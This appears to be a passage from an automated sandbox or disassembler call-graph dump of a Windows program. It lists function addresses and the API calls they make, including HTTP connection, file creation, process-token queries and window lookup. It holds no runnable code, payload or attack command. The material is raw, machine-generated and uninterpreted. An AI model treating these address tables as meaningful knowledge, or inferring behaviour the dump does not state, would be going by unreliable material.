1110d14e CreateEventA 96189->96193 96190->96189 96191->96186 96214 1115e96a 34 API calls std::exception::_Copy_str 96191->96214 96192->96091 96194 1110d161 96193->96194 96195 1110d178 96193->96195 96216 110290f0 261 API calls 2 library calls 96194->96216 96198 1110c420 std::locale::_Init 261 API calls 96195->96198 96201 1110d17f 96198->96201 96199 1110d0cf 96215 1115edc1 RaiseException 96199->96215 96203 1110d19c 96201->96203 96204 1110d060 416 API calls 96201->96204 96205 1110c420 std::locale::_Init 261 API calls 96203->96205 96204->96203 96206 1110d1ac 96205->96206 96207 1110d1bd 96206->96207 96208 1110c520 3 API calls 96206->96208 96209 1110c2b0 416 API calls 96207->96209 96208->96207 96210 1110d1d5 96209->96210 96210->96192 96211->96094 96212->96106 96213->96104 96214->96199 96215->96186 96309 110cf1b0 96217->96309 96220 110cf45b 96223 110cf475 96220->96223 96224 110cf458 96220->96224 96221 110cf444 96323 110290f0 261 API calls 2 library calls 96221->96323 96223->96125 96224->96220 96324 110290f0 261 API calls 2 library calls 96224->96324 96228 110ce454 96227->96228 96229 11161dd7 __strdup 34 API calls 96228->96229 96230 110ce45f 96229->96230 96230->96230 96231 110ce180 261 API calls 96230->96231 96232 110ce483 96231->96232 96287 110292c1 std::ios_base::_Tidy 96239->96287 96240 110292f3 GetProcAddress 96241 1102930c InternetCloseHandle 96240->96241 96244 11029311 SetLastError 96240->96244 96241->96287 96242 110293e8 InternetOpenA 96242->96287 96243 110293cf GetProcAddress 96243->96242 96245 11029419 SetLastError 96243->96245 96244->96287 96245->96287 96246 11029345 GetProcAddress 96247 11029402 SetLastError 96246->96247 96246->96287 96248 11029372 GetLastError 96247->96248 96248->96287 96249 1113e8f0 std::locale::_Init 261 API calls 96249->96287 96250 1115f3b5 23 API calls _free 96250->96287 96251 11029395 GetProcAddress 96252 1102940f SetLastError 96251->96252 96251->96287 96252->96287 96253 110296e0 96257 11029816 GetProcAddress 96253->96257 96258 110296d1 96253->96258 96254 11029850 96254->96144 96255 11029849 FreeLibrary 96255->96254 96256 110296f7 GetProcAddress 96259 110297ce SetLastError 96256->96259 96262 110296ba std::ios_base::_Tidy 96256->96262 96257->96258 96260 11029837 SetLastError 96257->96260 96258->96254 96258->96255 96282 110297d6 std::ios_base::_Tidy 96259->96282 96260->96258 96261 11080b10 IsDBCSLeadByte 96261->96287 96262->96253 96262->96256 96262->96258 96280 11029728 std::ios_base::_Tidy 96262->96280 96262->96282 96264 110297fb 96265 1110c4a0 std::locale::_Init 261 API calls 96265->96280 96267 1102949f GetProcAddress 96271 110294bc SetLastError 96267->96271 96267->96287 96268 110294cb GetProcAddress 96269 110294de InternetConnectA 96268->96269 96273 11029521 SetLastError 96268->96273 96269->96287 96271->96287 96273->96287 96274 11029504 GetProcAddress 96277 11029531 SetLastError 96274->96277 96274->96287 96275 11029543 GetProcAddress 96276 11029559 HttpOpenRequestA 96275->96276 96278 11029576 SetLastError 96275->96278 96276->96287 96277->96287 96278->96287 96279 110cedc0 264 API calls 96279->96280 96280->96262 96280->96265 96280->96279 96280->96282 96398 110274c0 GetProcAddress SetLastError 96280->96398 96281 11029591 GetProcAddress 96283 110295b8 SetLastError 96281->96283 96281->96287 96399 11027510 GetProcAddress SetLastError 96282->96399 96284 110295c2 GetLastError 96283->96284 96285 110295dd GetProcAddress 96284->96285 96284->96287 96286 1102960d SetLastError 96285->96286 96285->96287 96288 11029615 GetLastError 96286->96288 96287->96240 96287->96241 96287->96242 96287->96243 96287->96246 96287->96248 96287->96249 96287->96250 96287->96251 96287->96261 96287->96262 96287->96267 96287->96268 96287->96269 96287->96274 96287->96275 96287->96276 96287->96281 96287->96284 96287->96288 96289 1102962c GetDesktopWindow 96287->96289 96288->96287 96288->96289 96289->96287 96290 1102963a GetProcAddress 96289->96290 96290->96287 96291 11029676 SetLastError 96290->96291 96291->96287 96292->96125 96293->96144 96401 110ce2f0 96294->96401 96297 110ce519 96298 110ce502 96303->96120 96304->96122 96310 110cf1bc 96309->96310 96311 110cf1d7 96310->96311 96312 110cf1c0 96310->96312 96325 110cdeb0 96311->96325 96354 110290f0 261 API calls 2 library calls 96312->96354 96319 110cf20e 96319->96220 96319->96221 96320 110cf1f7 96355 110290f0 261 API calls 2 library calls 96320->96355 96326 110cdeb9 96325->96326 96327 110cdebd 96326->96327 96328 110cded4 96326->96328 96356 110290f0 261 API calls 2 library calls 96327->96356 96330 110cded1 96328->96330 96331 110cdf08 96328->96331 96330->96328 96357 110290f0 261 API calls 2 library calls 96330->96357 96332 110cdf05 96331->96332 96333 110cdf26 96331->96333 96332->96331 96358 110290f0 261 API calls 2 library calls 96332->96358 96337 110cedc0 96333->96337 96338 110cedce 96337->96338 96339 110cedd2 96338->96339 96341 110cede9 96338->96341 96359 110290f0 261 API calls 2 library calls 96339->96359 96341->96341 96343 110cee1c 96341->96343 96345 110cede6 96341->96345 96342 110cee90 96342->96319 96342->96320 96343->96342 96361 110ce710 96343->96361 96345->96341 96360 110290f0 261 API calls 2 library calls 96345->96360 96350 110cee4f _memmove 96350->96342 96351 110cee79 96350->96351 96373 110290f0 261 API calls 2 library calls 96351->96373 96362 110ce71d 96361->96362 96363 110ce738 96362->96363 96364 110ce721 96362->96364 96366 110ce735 96363->96366 96367 110ce756 96363->96367 96379 110290f0 261 API calls 2 library calls 96364->96379 96366->96363 96380 110290f0 261 API calls 2 library calls 96366->96380 96374 110ce180 96367->96374 96372 110ce650 264 API calls 2 library calls 96372->96350 96375 110ce18b 96374->96375 96376 110ce1a2 96374->96376 96381 110290f0 261 API calls 2 library calls 96375->96381 96376->96350 96376->96372 96398->96280 96399->96264 96402 110ce31c 96401->96402 96403 110ce309 96401->96403 96402->96297 96402->96298 96403->96402 96404 110ce180 261 API calls 96403->96404 96404->96402 96407 1110c420 std::locale::_Init 261 API calls 96406->96407 96408 110ffe0d 96407->96408 96409 110ffe40 96408->96409 96414 110ffcc0 96408->96414 96409->96160 96411 110ffe2d 96411->96160 96412->96164 96413->96166 96421 1115bd20 96414->96421 96417 110ffd27 std::locale::_Init 96419 110ffd60 GetStockObject RegisterClassA 96417->96419 96418 110ffd91 CreateWindowExA 96418->96411 96419->96418 96420 110ffd8a 96419->96420 96420->96418 96424 1115ab80 GlobalAddAtomA 96421->96424 96425 1115abb5 GetLastError wsprintfA 96424->96425 96426 1115ac07 GlobalAddAtomA GlobalAddAtomA 96424->96426 96433 110290f0 261 API calls 2 library calls 96425->96433 96428 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96426->96428 96430 110ffcf1 GlobalAddAtomA 96428->96430 96430->96417 96430->96418 96435 1109dc40 GetTokenInformation 96434->96435 96440 1109dcd6 96434->96440 96438 1109dc62 __crtGetStringTypeA_stat 96435->96438 96436 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96437 1109dce8 96436->96437 96437->96022 96439 1109dc68 GetTokenInformation 96438->96439 96438->96440 96439->96440 96441 1109dc7a 96439->96441 96440->96436 96442 1109dcaf EqualSid 96441->96442 96443 1109dc83 AllocateAndInitializeSid 96441->96443 96442->96440 96444 1109dcbd 96442->96444 96443->96440 96443->96442 96445 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96444->96445 96446 1109dcd2 96445->96446 96446->96022 96448 1113f69a 96447->96448 96448->96039 96450 1116021d 96449->96450 96451 1116020b 96449->96451 96464 111601ac 75 API calls 2 library calls 96450->96464 96451->96049 96453 11160227 96453->96049 96455 11080d0d 96454->96455 96456 11080d12 96454->96456 96465 11080a30 IsDBCSLeadByte 96455->96465 96458 11080d1b 96456->96458 96463 11080d33 96456->96463 96466 1115ff54 81 API calls 3 library calls 96458->96466 96460 11080d2c 96460->96038 96461 11080d39 96461->96038 96462 11161f66 81 API calls std::locale::_Init 96462->96463 96463->96461 96463->96462 96464->96453 96465->96456 96466->96460 96467->95891 96468->95885 96469->95897 96470->95901 96471->95901 96473 111610dd 96472->96473 96474 111610f6 96472->96474 96473->96474 96505 1116c9b8 8 API calls 96473->96505 96476 11161d95 96474->96476 96506 1116fe36 LeaveCriticalSection 96476->96506 96478 11161ce2 96479 11161a47 96478->96479 96480 11161a70 96479->96480 96486 11161a8b 96479->96486 96481 11161a7a 96480->96481 96484 1116170d __setlocale_set_cat 97 API calls 96480->96484 96485 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96481->96485 96482 11161bdc 96507 111614ec 96482->96507 96484->96481 96488 11161c61 96485->96488 96486->96482 96489 11161ac0 _strpbrk _strncmp _strcspn _strlen 96486->96489 96490 11161bb5 96486->96490 96488->95922 96488->95926 96489->96481 96489->96490 96494 11161bce 96489->96494 96496 1116170d __setlocale_set_cat 97 API calls 96489->96496 96561 11165309 34 API calls 2 library calls 96489->96561 96490->96481 96562 11161387 38 API calls 4 library calls 96490->96562 96495 1116a682 __invoke_watson 10 API calls 96494->96495 96495->96481 96496->96489 96497->95908 96498->95914 96505->96474 96506->96478 96508 11167f85 __getptd 62 API calls 96507->96508 96509 11161527 96508->96509 96511 1116158d __setlocale_get_all _memmove _strlen 96509->96511 96513 1116866f _strcpy_s 34 API calls 96509->96513 96519 11161594 96509->96519 96511->96519 96513->96511 96561->96489 96562->96481 96635 1113f146 96633->96635 96634 1113f203 96634->95939 96635->96634 96640 11080b10 96635->96640 96637 1113f16b 96638 11080b10 IsDBCSLeadByte 96637->96638 96639 1113f19b _memmove 96638->96639 96639->95939 96641 11080b1c 96640->96641 96643 11080b21 std::locale::_Init 96640->96643 96644 11080a30 IsDBCSLeadByte 96641->96644 96643->96637 96644->96643 96683 11160c1d 96684 11160c29 ___lock_fhandle 96683->96684 96685 11160c3c 96684->96685 96687 11160c6d 96684->96687 96720 11165abf 23 API calls __getptd_noexit 96685->96720 96690 11167769 __lock_file EnterCriticalSection 96687->96690 96692 11160c4c ___lock_fhandle 96687->96692 96688 11160c41 96721 1116a6d4 11 API calls __write_nolock 96688->96721 96691 11160c7b 96690->96691 96693 11165a57 __fclose_nolock 34 API calls 96691->96693 96696 11160cf1 96691->96696 96698 11160c8c 96693->96698 96694 11160d1e 96724 11160d4d LeaveCriticalSection LeaveCriticalSection __ftelli64 96694->96724 96696->96694 96702 1116e1f5 96696->96702 96698->96696 96722 11165abf 23 API calls __getptd_noexit 96698->96722 96700 11160ce6 96723 1116a6d4 11 API calls __write_nolock 96700->96723 96703 1116e202 96702->96703 96709 1116e217 __getbuf 96702->96709 96755 11165abf 23 API calls __getptd_noexit 96703->96755 96705 1116e212 96705->96696 96706 1116e207 96756 1116a6d4 11 API calls __write_nolock 96706->96756 96708 11165a57 __fclose_nolock 34 API calls 96710 1116e260 96708->96710 96709->96705 96709->96708 96725 11170fc0 96710->96725 96712 1116e267 96712->96705 96713 11165a57 __fclose_nolock 34 API calls 96712->96713 96714 1116e28a 96713->96714 96714->96705 96715 11165a57 __fclose_nolock 34 API calls 96714->96715 96716 1116e296 96715->96716 96716->96705 96717 11165a57 __fclose_nolock 34 API calls 96716->96717 96718 1116e2a3 96717->96718 96719 11165a57 __fclose_nolock 34 API calls 96718->96719 96719->96705 96720->96688 96721->96692 96722->96700 96723->96696 96724->96692 96726 11170fcc ___lock_fhandle 96725->96726 96727 11170fd4 96726->96727 96728 11170fef 96726->96728 96757 11165ad2 23 API calls __getptd_noexit 96727->96757 96729 11170ffb 96728->96729 96734 11171035 96728->96734 96759 11165ad2 23 API calls __getptd_noexit 96729->96759 96732 11170fd9 96758 11165abf 23 API calls __getptd_noexit 96732->96758 96733 11171000 96760 11165abf 23 API calls __getptd_noexit 96733->96760 96737 11171057 96734->96737 96738 11171042 96734->96738 96739 111731d2 ___lock_fhandle 3 API calls 96737->96739 96762 11165ad2 23 API calls __getptd_noexit 96738->96762 96743 1117105d 96739->96743 96740 11171008 96761 1116a6d4 11 API calls __write_nolock 96740->96761 96742 11171047 96763 11165abf 23 API calls __getptd_noexit 96742->96763 96746 1117107f 96743->96746 96747 1117106b 96743->96747 96745 11170fe1 ___lock_fhandle 96745->96712 96764 11165abf 23 API calls __getptd_noexit 96746->96764 96749 11170a09 __read_nolock 44 API calls 96747->96749 96751 11171077 96749->96751 96766 111710ae LeaveCriticalSection __unlock_fhandle 96751->96766 96752 11171084 96765 11165ad2 23 API calls __getptd_noexit 96752->96765 96755->96706 96756->96705 96757->96732 96758->96745 96759->96733 96760->96740 96761->96745 96762->96742 96763->96740 96764->96752 96765->96751 96766->96745 96767 11112b00 96785 11141990 96767->96785 96770 11112b45 96771 11112b54 CoInitialize CoCreateInstance 96770->96771 96772 11112b28 96770->96772 96775 11112b84 LoadLibraryA 96771->96775 96784 11112b79 96771->96784 96773 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96772->96773 96776 11112b36 96773->96776 96774 11141710 std::locale::_Init 86 API calls 96774->96770 96777 11112ba0 GetProcAddress 96775->96777 96775->96784 96780 11112bb0 SHGetSettings 96777->96780 96781 11112bc4 FreeLibrary 96777->96781 96778 11112c61 CoUninitialize 96779 11112c67 96778->96779 96782 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96779->96782 96780->96781 96781->96784 96783 11112c76 96782->96783 96784->96778 96784->96779 96786 11141710 std::locale::_Init 86 API calls 96785->96786 96787 11112b1e 96786->96787 96787->96770 96787->96772 96787->96774 96788 11017610 GetTickCount 96795 11017520 96788->96795 96793 11142a60 std::locale::_Init 21 API calls 96794 11017657 96793->96794 96796 11017540 96795->96796 96803 110175f6 96795->96803 96797 11017562 CoInitialize 96796->96797 96799 11017559 WaitForSingleObject 96796->96799 96823 111585e0 96797->96823 96798 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96801 11017605 96798->96801 96799->96797 96809 11017440 96801->96809 96802 110175f0 CoUninitialize 96802->96803 96803->96798 96804 110175e2 96804->96802 96804->96803 96805 110175dc 96835 11160007 35 API calls __fassign 96805->96835 96807 111601fd std::locale::_Init 75 API calls 96808 11017591 96807->96808 96808->96804 96808->96805 96808->96807 96810 11017460 96809->96810 96818 11017506 96809->96818 96812 11017478 CoInitialize 96810->96812 96813 1101746f WaitForSingleObject 96810->96813 96811 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96815 11017515 SetEvent GetTickCount 96811->96815 96814 111585e0 271 API calls 96812->96814 96813->96812 96820 110174a7 96814->96820 96815->96793 96816 110174f2 96817 11017500 CoUninitialize 96816->96817 96816->96818 96817->96818 96818->96811 96819 110174ec 96869 11160007 35 API calls __fassign 96819->96869 96820->96816 96820->96819 96822 111601fd std::locale::_Init 75 API calls 96820->96822 96822->96820 96824 111585f4 96823->96824 96825 111585ec 96823->96825 96836 1115f97b 96824->96836 96825->96808 96828 11158614 96828->96808 96829 11158740 96831 1115f3b5 _free 23 API calls 96829->96831 96832 11158768 96831->96832 96832->96808 96833 11158631 96833->96829 96834 11158724 SetLastError 96833->96834 96834->96833 96835->96804 96837 1116c936 __calloc_crt 23 API calls 96836->96837 96838 1115f995 96837->96838 96839 11158608 96838->96839 96860 11165abf 23 API calls __getptd_noexit 96838->96860 96839->96828 96839->96829 96843 11158220 CoInitializeSecurity CoCreateInstance 96839->96843 96841 1115f9a8 96841->96839 96861 11165abf 23 API calls __getptd_noexit 96841->96861 96844 11158295 wsprintfW SysAllocString 96843->96844 96845 11158414 96843->96845 96849 111582db 96844->96849 96846 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96845->96846 96848 11158440 96846->96848 96847 11158401 SysFreeString 96847->96845 96848->96833 96849->96847 96849->96849 96850 1115836c 96849->96850 96851 1115835a wsprintfW 96849->96851 96859 111583e9 96849->96859 96862 110967f0 96850->96862 96851->96850 96853 1115837e 96854 110967f0 262 API calls 96853->96854 96855 11158393 96854->96855 96867 110968b0 InterlockedDecrement SysFreeString std::ios_base::_Tidy 96855->96867 96857 111583d7 96868 110968b0 InterlockedDecrement SysFreeString std::ios_base::_Tidy 96857->96868 96859->96847 96860->96841 96861->96839 96863 1110c420 std::locale::_Init 261 API calls 96862->96863 96864 11096823 96863->96864 96865 11096836 SysAllocString 96864->96865 96866 11096854 96864->96866 96865->96866 96866->96853 96867->96857 96868->96859 96869->96816 96870 11025850 96871 1102585a 96870->96871 96873 11025860 96870->96873 96872 11160535 std::locale::_Init 98 API calls 96871->96872 96872->96873 96874 11132080 96875 11132089 96874->96875 96881 111320b8 96874->96881 96876 11141990 std::locale::_Init 86 API calls 96875->96876 96877 1113208e 96876->96877 96877->96881 96882 1112fc80 96877->96882 96879 11132097 96879->96881 96910 1105d340 96879->96910 96883 1112fca1 std::locale::_Init 96882->96883 96884 1112fdc1 96882->96884 96887 1112fcb6 96883->96887 96888 1112fccd 96883->96888 96885 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96884->96885 96886 1112fdd5 96885->96886 96886->96879 96890 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96887->96890 96889 11141240 std::locale::_Init 261 API calls 96888->96889 96892 1112fcda wsprintfA 96889->96892 96891 1112fcc9 96890->96891 96891->96879 96920 1113f8a0 96892->96920 96894 1112fd00 96895 1112fd07 96894->96895 96896 1112fd78 96894->96896 96931 110b6bd0 96895->96931 96897 11141240 std::locale::_Init 261 API calls 96896->96897 96899 1112fd84 wsprintfA 96897->96899 96901 1113f8a0 std::locale::_Init 8 API calls 96899->96901 96900 1112fd12 96902 1112fda4 96900->96902 96903 1112fd1a GetTickCount SHGetFolderPathA GetTickCount 96900->96903 96901->96902 96904 11142a60 std::locale::_Init 21 API calls 96902->96904 96905 1112fd45 96903->96905 96907 1112fd50 96903->96907 96904->96884 96906 11142a60 std::locale::_Init 21 API calls 96905->96906 96906->96907 96907->96902 96946 110eb6b0 9 API calls 96907->96946 96909 1112fd73 96909->96902 96911 1105d36f 96910->96911 96912 1105d395 96911->96912 96913 1105d375 96911->96913 96915 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96912->96915 96914 1115fe1b __wcstoi64 75 API calls 96913->96914 96917 1105d382 96914->96917 96916 1105d3a2 96915->96916 96916->96881 96918 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96917->96918 96919 1105d38f 96918->96919 96919->96881 96921 1113f8c1 CreateFileA 96920->96921 96923 1113f95e CloseHandle 96921->96923 96924 1113f93e 96921->96924 96927 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96923->96927 96925 1113f942 CreateFileA 96924->96925 96926 1113f97b 96924->96926 96925->96923 96925->96926 96929 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96926->96929 96928 1113f977 96927->96928 96928->96894 96930 1113f98a 96929->96930 96930->96894 96932 110b6be3 GetModuleHandleA GetProcAddress 96931->96932 96933 110b6ca4 96931->96933 96934 110b6c2a GetCurrentProcessId OpenProcess 96932->96934 96935 110b6c0f GetCurrentProcessId 96932->96935 96933->96900 96936 110b6c47 OpenProcessToken 96934->96936 96941 110b6c77 96934->96941 96937 110b6c18 96935->96937 96938 110b6c58 96936->96938 96936->96941 96937->96934 96939 110b6c1c 96937->96939 96940 110b6c5f GetTokenInformation 96938->96940 96938->96941 96939->96900 96940->96941 96942 110b6c93 CloseHandle 96941->96942 96943 110b6c96 96941->96943 96942->96943 96944 110b6c9a CloseHandle 96943->96944 96945 110b6c9d 96943->96945 96944->96945 96945->96933 96946->96909 96947 11030b10 96948 11030b1e 96947->96948 96952 11142490 96948->96952 96951 11030b3f std::locale::_Init std::ios_base::_Tidy 96955 11141680 96952->96955 96956 11141690 96955->96956 96956->96956 96957 1110c4a0 std::locale::_Init 261 API calls 96956->96957 96958 111416a2 96957->96958 96961 111415b0 96958->96961 96960 11030b2f SetUnhandledExceptionFilter 96960->96951 96962 11141602 __crtGetStringTypeA_stat 96961->96962 96963 111415c7 _strncpy 96961->96963 96972 1113ed90 MultiByteToWideChar 96962->96972 96965 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96963->96965 96967 111415fe 96965->96967 96966 11141634 96973 1113edd0 WideCharToMultiByte GetLastError 96966->96973 96967->96960 96969 11141646 96970 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96969->96970 96971 11141659 96970->96971 96971->96960 96972->96966 96973->96969 96974 11137300 96975 1113730c 96974->96975 96976 111373c8 96975->96976 96979 11137368 96975->96979 96981 111373da 96975->96981 96977 11136060 374 API calls 96976->96977 96976->96981 96977->96981 96978 111373a0 96984 11136060 96978->96984 96979->96978 96979->96981 96982 1105d340 75 API calls 96979->96982 96982->96978 96983 111373b1 96985 1113649f 96984->96985 96988 1113607d 96984->96988 96986 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96985->96986 96987 111364ae 96986->96987 96987->96983 96988->96985 96989 11141710 std::locale::_Init 86 API calls 96988->96989 96990 111360bc 96989->96990 96990->96985 96991 1105d340 75 API calls 96990->96991 96992 111360eb 96991->96992 97064 111299f0 96992->97064 96994 11136230 PostMessageA 96996 11136245 96994->96996 96995 1105d340 75 API calls 96997 1113622c 96995->96997 96998 11136255 96996->96998 97078 1110c270 InterlockedDecrement 96996->97078 96997->96994 96997->96996 97000 1113625b 96998->97000 97001 1113627d 96998->97001 97004 111362b3 std::ios_base::_Tidy 97000->97004 97005 111362ce 97000->97005 97079 1112d530 297 API calls std::locale::_Init 97001->97079 97003 11136285 97080 111434d0 263 API calls 97003->97080 97013 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 97004->97013 97082 1113f4f0 97005->97082 97009 111362d3 97087 111434f0 97009->97087 97010 1113628f 97081 11129bf0 SetDlgItemTextA 97010->97081 97016 111362ca 97013->97016 97015 111362a0 std::ios_base::_Tidy 97015->97000 97016->96983 97017 111362f6 97090 11132620 295 API calls 5 library calls 97017->97090 97020 111361db 97020->96994 97020->96995 97021 11136354 97022 11136368 97021->97022 97023 1113642c 97021->97023 97028 1113638c 97022->97028 97093 11132620 295 API calls 5 library calls 97022->97093 97026 1113644d 97023->97026 97031 1113643b 97023->97031 97032 11136434 97023->97032 97024 11136327 97024->97021 97027 1113633c 97024->97027 97025 111362fd std::ios_base::_Tidy 97025->97021 97025->97024 97091 11132620 295 API calls 5 library calls 97025->97091 97092 1112e330 143 API calls 97027->97092 97065 11129a0c 97064->97065 97066 11129a47 97065->97066 97068 11129a34 97065->97068 97101 1106ae60 294 API calls 97066->97101 97069 111434f0 265 API calls 97068->97069 97070 11129a3f 97069->97070 97071 11129a93 97070->97071 97072 1113e8f0 std::locale::_Init 261 API calls 97070->97072 97071->97020 97073 11142150 97071->97073 97072->97071 97074 1110c650 4 API calls 97073->97074 97075 1114215f 97074->97075 97102 11141100 97075->97102 97078->96998 97079->97003 97080->97010 97081->97015 97083 1113f4f9 97082->97083 97084 1113f4ff 97082->97084 97083->97009 97085 1102a250 std::locale::_Init 141 API calls 97084->97085 97086 1113f516 97085->97086 97086->97009 97117 111433b0 97087->97117 97090->97025 97091->97024 97101->97070 97113 110952d0 97102->97113 97105 11141124 wsprintfA 97106 11141137 97105->97106 97107 11141152 97106->97107 97108 1114113b 97106->97108 97112 11141163 97107->97112 97116 11140d70 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 97107->97116 97115 110290f0 261 API calls 2 library calls 97108->97115 97112->97020 97114 110952d9 LoadStringA 97113->97114 97114->97105 97114->97106 97116->97112 97118 110952d0 97117->97118 97119 111433de LoadStringA 97118->97119 97120 11143402 97119->97120 97121 111433f0 97119->97121 97122 1114341e 97120->97122 97123 11143409 wsprintfA 97120->97123 97146 11140d70 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 97121->97146 97125 1114343a 97122->97125 97126 11143426 97122->97126 97123->97125 97132 11143250 97125->97132 97147 110290f0 261 API calls 2 library calls 97126->97147 97130 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 97131 111362da SetWindowTextA 97130->97131 97131->97017 97131->97025 97133 11080b10 IsDBCSLeadByte 97132->97133 97134 111432a0 97133->97134 97135 111432e3 wvsprintfA 97134->97135 97136 111601fd std::locale::_Init 75 API calls 97134->97136 97138 111432f8 97135->97138 97139 111432b3 97136->97139 97137 11143314 97141 1113e8f0 std::locale::_Init 261 API calls 97137->97141 97138->97137 97140 11142a60 std::locale::_Init 21 API calls 97138->97140 97139->97135 97142 111432c0 FormatMessageA 97139->97142 97140->97137 97143 11143324 97141->97143 97142->97138 97144 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 97143->97144 97145 111433a6 97144->97145 97145->97130 97146->97120 97148 11088b50 97149 1110c650 4 API calls 97148->97149 97150 11088b63 97149->97150 97151 11088b6d 97150->97151 97160 11088290 264 API calls std::locale::_Init 97150->97160 97154 11088b94 97151->97154 97161 11088290 264 API calls std::locale::_Init 97151->97161 97156 11088ba3 97154->97156 97157 11088b20 97154->97157 97162 110887b0 97157->97162 97160->97151 97161->97154 97203 11087ab0 6 API calls 97162->97203 97164 110887e9 GetParent 97165 110887fc 97164->97165 97166 1108880d 97164->97166 97167 11088800 GetParent 97165->97167 97168 11141430 263 API calls 97166->97168 97167->97166 97167->97167 97169 11088819 97168->97169 97170 1116076b std::locale::_Init 139 API calls 97169->97170 97171 11088826 std::ios_base::_Tidy 97170->97171 97172 11141430 263 API calls 97171->97172 97173 1108883f 97172->97173 97204 110139e0 22 API calls 2 library calls 97173->97204 97175 1108885a 97176 1113f8a0 std::locale::_Init 8 API calls 97175->97176 97179 1108889a std::ios_base::_Tidy 97176->97179 97177 110888b5 97178 11160535 std::locale::_Init 98 API calls 97177->97178 97181 110888d3 std::locale::_Init 97177->97181 97178->97181 97179->97177 97180 1113e8f0 std::locale::_Init 261 API calls 97179->97180 97180->97177 97183 1102a250 std::locale::_Init 141 API calls 97181->97183 97194 11088984 std::ios_base::_Tidy 97181->97194 97182 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 97184 11088a72 97182->97184 97185 11088923 97183->97185 97184->97156 97186 1113e8f0 std::locale::_Init 261 API calls 97185->97186 97187 1108892b 97186->97187 97188 11080be0 std::locale::_Init IsDBCSLeadByte 97187->97188 97189 11088942 97188->97189 97189->97194 97205 11080c50 97189->97205 97191 1108895a 97192 1108899e 97191->97192 97193 11088961 97191->97193 97196 11080c50 82 API calls 97192->97196 97215 110b6880 97193->97215 97194->97182 97198 110889a9 97196->97198 97198->97194 97200 110b6880 36 API calls 97198->97200 97199 110b6880 36 API calls 97199->97194 97201 110889b6 97200->97201 97201->97194 97202 110b6880 36 API calls 97201->97202 97202->97194 97203->97164 97204->97175 97206 11080c5d 97205->97206 97207 11080c62 97205->97207 97218 11080a30 IsDBCSLeadByte 97206->97218 97209 11080c6b 97207->97209 97210 11080c7f 97207->97210 97219 11160e4e 81 API calls 3 library calls 97209->97219 97212 11080ce3 97210->97212 97214 11161f66 81 API calls std::locale::_Init 97210->97214 97212->97191 97213 11080c78 97213->97191 97214->97210 97220 110b6860 97215->97220 97218->97207 97219->97213 97223 11163ab3 97220->97223 97226 11163a34 97223->97226 97227 11163a41 97226->97227 97228 11163a5b 97226->97228 97244 11165ad2 23 API calls __getptd_noexit 97227->97244 97228->97227 97229 11163a64 GetFileAttributesA 97228->97229 97231 11163a72 GetLastError 97229->97231 97238 11163a88 97229->97238 97247 11165ae5 23 API calls 3 library calls 97231->97247 97232 11163a46 97245 11165abf 23 API calls __getptd_noexit 97232->97245 97234 11088967 97234->97194 97234->97199 97236 11163a4d 97246 1116a6d4 11 API calls __write_nolock 97236->97246 97238->97234 97249 11165ad2 23 API calls __getptd_noexit 97238->97249 97241 11163a9b 97250 11165abf 23 API calls __getptd_noexit 97241->97250 97243 11163a7e 97248 11165abf 23 API calls __getptd_noexit 97243->97248 97244->97232 97245->97236 97246->97234 97247->97243 97248->97234 97249->97241 97250->97243 97251 1102e15e 97252 11080c50 82 API calls 97251->97252 97253 1102e171 97252->97253 97254 1113f220 82 API calls 97253->97254 97255 1102e19a 97254->97255 97256 1115f5b7 std::locale::_Init 75 API calls 97255->97256 97261 1102e1a7 97255->97261 97256->97261 97257 1102e1d6 97258 1102e248 97257->97258 97259 1102e22f GetSystemMetrics 97257->97259 97263 1102e262 CreateEventA 97258->97263 97259->97258 97260 1102e23e 97259->97260 97262 11142a60 std::locale::_Init 21 API calls 97260->97262 97261->97257 97264 11141710 std::locale::_Init 86 API calls 97261->97264 97262->97258 97265 1102e275 97263->97265 97266 1102e289 97263->97266 97264->97257 98162 110290f0 261 API calls 2 library calls 97265->98162 97268 1110c420 std::locale::_Init 261 API calls 97266->97268 97269 1102e290 97268->97269 97270 1110d060 422 API calls 97269->97270 97271 1102e2b0 97270->97271 97272 1110c420 std::locale::_Init 261 API calls 97271->97272 97273 1102e2c4 97272->97273 97274 1110d060 422 API calls 97273->97274 97275 1102e2e4 97274->97275 97276 1110c420 std::locale::_Init 261 API calls 97275->97276 97277 1102e363 97276->97277 97278 11060520 261 API calls 97277->97278 97279 1102e393 97278->97279 97280 1110c420 std::locale::_Init 261 API calls 97279->97280 97281 1102e3ad 97280->97281 97282 1102e3d6 FindWindowA 97281->97282 97283 1102e527 97282->97283 97284 1102e40b 97282->97284 97614 11060970 97283->97614 97284->97283 97288 1102e423 GetWindowThreadProcessId 97284->97288 97287 